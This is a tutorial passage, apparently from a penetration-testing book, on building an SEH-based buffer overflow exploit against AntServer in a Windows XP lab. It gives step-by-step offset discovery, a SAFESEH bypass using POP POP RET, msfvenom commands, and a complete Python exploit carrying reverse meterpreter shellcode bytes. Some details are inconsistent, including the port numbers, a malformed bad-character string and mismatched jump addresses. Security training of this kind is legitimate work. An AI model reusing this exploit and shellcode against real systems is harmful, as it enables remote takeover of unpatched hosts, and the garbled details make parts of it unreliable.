In this recipe, you will learn how to do this:
- Let's download a program called AntServer. It has a lot of public exploits available, and we will try to build our own exploit for it.
- We will install it on the Windows XP SP2 machine that we used in the previous recipe.
- AntServer had a vulnerability that could be triggered by sending a long USV request to the AntServer running on port 6600:

- Let's run the AntServer by opening the software and navigating to Server | Run Service Control...:

- Now let's write a simple Python script, that will send a large request to this server on port 6600:
#!/usr/bin/pythonimport socket
import socket
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((address, port))
- Coming back to the Windows machine, let's start Immunity Debugger and attach the process AntServer.exe to it. And then, click on Run.
- Once the program is running, we run our Python script from Kali, and in our Debugger, we will see a violation error. However, our EIP has not been overwritten yet:

- In the File menu in the debugger, we go to View | SEH chain. Here, we will see that the address has been overwritten by AAAA. Now we press Shift+ F9 to pass an exception to the program. We will see that the EIP has been overwritten, and we get an error:

- We will also notice that the other register values have now become zero. This zeroing of registers was introduced in Windows XP SP1 and later in order to make SEH exploitation more difficult.
- We are using Windows XP SP2. It has a feature called SAFESEH. When this option is enabled in the module, only the memory addresses listed on the registered SEH handlers list can be used, which means if we use any address that is not on the list, from a module compiled with /SAFESEH ON, the SEH address will not be used by the Windows exception handler and the SEH overwrite will fail.
- There are a few ways to bypass this, and this is one of them: using an overwrite address from a module that was not compiled with the /SAFESEH ON or IMAGE_DLLCHARACTERISTICS_NO_SEH options.
- To find that, we will use a plugin called mona for Immunity Debugger. It can be downloaded from

- We simply copy the Python file into the PyCommands folder of the Immunity application.
- Let's move on to making the exploit. We have seen that the EIP has already been overwritten. Now we will try to find the exact bytes at which the crash occurs using the pattern create script in Kali Linux:
ruby /path/to/script/pattern_create.rb -l 2500
The following screenshot shows the output of the preceding command:

- The code should be something like this:

- We now run this file, and in Immunity Debugger, we will see the access violation error. We now go to View | SEH chain.
- We will see that our SEH has been overwritten with bytes. We copy the 42326742 value and find its location using the pattern_offset script in Kali:

ruby /path/to/script/pattern_offset.rb -q 423267412
The following screenshot shows the output of the preceding command:

- We will see that the offset is 966 bytes at which the handler is overwritten.
- Now let's modify our exploit a bit and see what happens. We have 966 bytes; we will use 962 bytes of As and 4 bytes of breakpoint and 4 with Bs and the rest of the bytes with Cs to see what happens:
import socket address=""
port=6660 buffer = "USV "
buffer+= "A" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "BBBB"
buffer+= "C" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- We run this and view the SEH chain. Here, we will notice an interesting thing: the first 4 breakpoints we added have actually overwritten a memory address, and the next 4 have been overwritten into our SEH handler:

This happens as the SEH is a pointer that points to the memory address where the code is stored when an exception occurs.
- Let's pass the exception to the program and we will see that EIP has been overwritten, but when we look in the memory, we will see that our Cs have been written approximately 6 bytes after our Bs in the memory. We can use a POP RET followed by a short JUMP code to jump to our shellcode.
- We type the !safeseh command in the debugger's console:

- This will show us the list of all DLLs that are not compiled using SAFESEH/ON. In the log window, we will see the list of the functions:

- Let's use a DLL vbajet32.dll. Our goal is to find a POP POP RET sequence in the DLL, that we can use to bypass SEH.
- We find our DLL on the Windows machine and copy it to Kali. Kali has another great tool known as msfpescan, that can be used to find the POP POP RET sequence in the DLL:
/path/to/msfpescan -f vbajet32.dll -s
The following screenshot shows the output of the preceding command:

- Here, we have the address for all the POP POP RET sequences in the .dll. We will use the first one, 0x0f9a1f0b. We also need a short JUMP code, that will cause a jump to our shellcode or Cs stored in the memory.
- Short JUMP is \xeb\x06, where 06 is the number of bytes we need to jump. We are still 2 bytes short of the 4-byte address space and we can use 2 NOPs.
- Let's create a shellcode; since we are sending this over HTTP, we need to make sure we avoid bad characters. We will use msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp -f py
-b "\x00\xff\x20\x25\x0a\x-d" -v buffer
The following screenshot shows the output of the preceding command:

- We will put everything in the exploit, as follows:
import socket
buffer = "USV "
buffer += "\x41" * 962 #offset
# 6 Bytes SHORT jump to shellcode
buffer += "\xeb\x06\x90\x90"
# POP+POP+RET 0x0f9a196a
buffer += "\x6a\x19\x9a\x0f"
buffer += "\x90" * 16
#Shellcode Reverse meterpreter.
buffer += "\xdb\xde\xd9\x74\x24\xf4\xbf\xcf\x9f\xb1\x9a\x5e"
buffer += "\x31\xc9\xb1\x54\x83\xee\xfc\x31\x7e\x14\x03\x7e"
buffer += "\xdb\x7d\x44\x66\x0b\x03\xa7\x97\xcb\x64\x21\x72"
buffer += "\xfa\xa4\x55\xf6\xac\x14\x1d\x5a\x40\xde\x73\x4f"
buffer += "\xd3\x92\x5b\x60\x54\x18\xba\x4f\x65\x31\xfe\xce"
buffer += "\xe5\x48\xd3\x30\xd4\x82\x26\x30\x11\xfe\xcb\x60"
buffer += "\xca\x74\x79\x95\x7f\xc0\x42\x1e\x33\xc4\xc2\xc3"
buffer += "\x83\xe7\xe3\x55\x98\xb1\x23\x57\x4d\xca\x6d\x4f"
buffer += "\x92\xf7\x24\xe4\x60\x83\xb6\x2c\xb9\x6c\x14\x11"
buffer += "\x76\x9f\x64\x55\xb0\x40\x13\xaf\xc3\xfd\x24\x74"
buffer += "\xbe\xd9\xa1\x6f\x18\xa9\x12\x54\x99\x7e\xc4\x1f"
buffer += "\x95\xcb\x82\x78\xb9\xca\x47\xf3\xc5\x47\x66\xd4"
buffer += "\x4c\x13\x4d\xf0\x15\xc7\xec\xa1\xf3\xa6\x11\xb1"
buffer += "\x5c\x16\xb4\xb9\x70\x43\xc5\xe3\x1c\xa0\xe4\x1b"
buffer += "\xdc\xae\x7f\x6f\xee\x71\xd4\xe7\x42\xf9\xf2\xf0"
buffer += "\xa5\xd0\x43\x6e\x58\xdb\xb3\xa6\x9e\x8f\xe3\xd0"
buffer += "\x37\xb0\x6f\x21\xb8\x65\x05\x24\x2e\x46\x72\x48"
buffer += "\xa5\x2e\x81\x95\xa8\xf2\x0c\x73\x9a\x5a\x5f\x2c"
buffer += "\x5a\x0b\x1f\x9c\x32\x41\x90\xc3\x22\x6a\x7a\x6c"
buffer += "\xc8\x85\xd3\xc4\x64\x3f\x7e\x9e\x15\xc0\x54\xda"
buffer += "\x15\x4a\x5d\x1a\xdb\xbb\x14\x08\x0b\xda\xd6\xd0"
buffer += "\xcb\x77\xd7\xba\xcf\xd1\x80\x52\xcd\x04\xe6\xfc"
buffer += "\x2e\x63\x74\xfa\xd0\xf2\x4d\x70\xe6\x60\xf2\xee"
buffer += "\x06\x65\xf2\xee\x50\xef\xf2\x86\x04\x4b\xa1\xb3"
buffer += "\x4b\x46\xd5\x6f\xd9\x69\x8c\xdc\x4a\x02\x32\x3a"
buffer += "\xbc\x8d\xcd\x69\xbf\xca\x32\xef\x9d\x72\x5b\x0f"
buffer += "\xa1\x82\x9b\x65\x21\xd3\xf3\x72\x0e\xdc\x33\x7a"
buffer += "\x85\xb5\x5b\xf1\x4b\x77\xfd\x06\x46\xd9\xa3\x07"
buffer += "\x64\xc2\xb2\x89\x8b\xf5\xba\x6b\xb0\x23\x83\x19"
buffer += "\xf1\xf7\xb0\x12\x48\x55\x90\xb8\xb2\xc9\xe2\xe8"
buffer += "\x90" * (2504 - len(buffer))
buffer += "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sent!!"
The following screenshot shows the output of the preceding command:

- Let's run this without the debugger this time. We will open our handler in Kali, and we should have meterpreter access: